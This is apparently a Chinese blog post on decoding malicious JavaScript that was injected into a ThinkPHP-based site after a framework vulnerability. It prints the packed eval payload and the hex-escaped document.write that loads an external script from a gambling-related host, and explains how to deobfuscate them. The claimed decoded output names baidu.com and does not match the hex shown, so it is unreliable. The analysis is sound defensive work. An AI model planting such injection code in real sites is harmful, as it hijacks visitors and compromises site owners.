网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】
前几天,用了tp的框架,后来tp被爆出了漏洞,导致网站被植入了时式彩代码。通过百度搜索进入的用户,直接跳转到这个网站里。今天教给大家怎么解密这种采用eval加密的js代码。
恶意代码源码是这样的:
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="关键词1,关键词2,关键词3-"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\e\\c\\1\\l\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\\2\\1\\4\\9\\3\\0\\h\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76'.split('|'),0,{}))</script>
打开谷歌或者火狐浏览器,然后按 F12,打开console一栏,接着把这代码复制进去,
最后,去掉开头 4 个字母 eval 然后回车运行下就得到源码了。
此时,得到了这个代码:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6b\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
这是一段通过16进制编码的script病毒,然后我们还需要继续解码:
可以通过alert来解密,例如把上面第一段的粗体字代码解密:
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>
将此复制到文本文档,更改后缀保存为html格式,然后用浏览器运行就可以得出。
再复制后面的未解密代码到html里面,依次解密,解密后的代码为:
<script type="text/javascript">eval"window["document"]["write"]('<script type="text/javascript" src="https://www.baidu.com"></script>');"</script>
或者进入此网址:https://www.mokuge.com/tool/js_x16/
输入\x77\x72\x69\x74\x65,这种16进制代码进行转义就行。
网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】相关推荐
- 网页中加入最新款百度天气预报样式代码
iframe引入效果如下: Iframe引用代码 <iframe scrolling="no" src="https://tianqiapi.com/api.php ...
- html百度蜘蛛跳转代码,网页蜘蛛跳转代码对搜狗搜索引擎并不友好
跳转代码是微情报的站长给我.跳转代码有个好处,链接失效了不用全部更换,只需要在跳转代码里面替换下网址就行了. 因为跳转代码没有什么内容,并不希望搜索引擎蜘蛛访问.在robots协议里已经写了禁止蜘蛛访 ...
- 自动跳转代码与自动弹出网页代码
自动跳转代码与自动弹出网页代码 简单的几个页面跳转代码! 有的站点为了展现出广告,但又不影响页面访问,就采用自动跳转,在打开页面的几秒内显示广告,浏览者一定会等几秒钟,等待内容页面出现,此时就会看广告 ...
- 用python爬取动态网页上的图片(百度图片)
用python爬取动态网页上的图片(百度图片) 参考B站一个视频,视频链接: https://www.bilibili.com/video/BV1Va4y1Y7fK?share_source=copy ...
- html网页文件的主体标记,HTML的填空题:1.HTML文件中网页文件的主体标记是_________,标记页面标题的标记是_____________。如题 谢...
HTML文件中网页文件的主体标记是 ,标记页面标题的标记是. body元素是定义文档的主体,包含文档的所有内容.body是用在网页中的一种HTML标签,表示网页的主体部分,也就是用户可以看到的内容,可 ...
- 四种ASP网页跳转代码
时间:2012-06-12 21:12来源:未知 输入:铜都风尘 点击: 32987 次 如果你要在服务器端跳转,可以这样: Response.Redirect(http://blog.163.com ...
- 网页自动往下走html代码,网页自动跳转代码html
很多做博客搞网络的人并不懂技术,我也不懂,只能说会简单的操作而已,前段时间有个想法,就是让网页直接跳转,所以才找了这个网页自动跳转代码html 语言,非常简单实用,具体我想不用我多说,只需要简历个ht ...
- VB下载网页文件或图片的几种简易方法
原贴链接:http://www.suntw.com/vb6/vb-xia-zhai-wang-ye-wen-jian-he-tu-pian.html 一.使用 API 函数 URLDownloadTo ...
- html百度页面js代码,js代码让网页自动提交到百度
网站提交到百度的方法目前来说有三种,第一个主动推动(实时):第二个:自动推送:第三个:sitemap: 第一个主动推动我们之前的文章已经说过了,根据百度提供的参数,wordpress用户直接下载插件包 ...
最新文章
- 漫画:原来,我是备胎!!!
- 【运筹学】表上作业法 ( 示例 | 使用 “ 最小元素法 “ 找初始基可行解 )
- H5页面单点登录跳回首页 http url参数转义
- gganimate|让你的图动起来!!!
- 多线程java_初学Java要注意什么 怎么掌握Java多线程知识
- 15个友好的jQuery 提示框插件
- BZOJ 2763 飞行线路
- 排序算法之二 插入排序(C++版本)
- linux端口被墙了 开通端口
- vscode 配置c++环境 万能头文件
- [转载]MTK入门教程
- 汇编语言工具(DosBox、debug)下载与安装教程
- PC大作[微软模拟飞行10]
- Linux awk 中 BEGIN 和 END 的使用方法
- html 在行前显示黑点,Word里有些文字行前面有小黑点是怎么回事?
- 记开发过的一款无线音箱解决方案
- 一网打尽!所有PMP的计算公式都在这里啦,赶紧学起来(1)
- pyside2安装后打开designer.exe文件提示丢失 MSVCP140.dll的处理方法
- 17 岁成为 iOS 越狱之父,25 岁造出无人车,黑客传奇!
- 汽车CAN通信基础知识-Java之Socket通信实战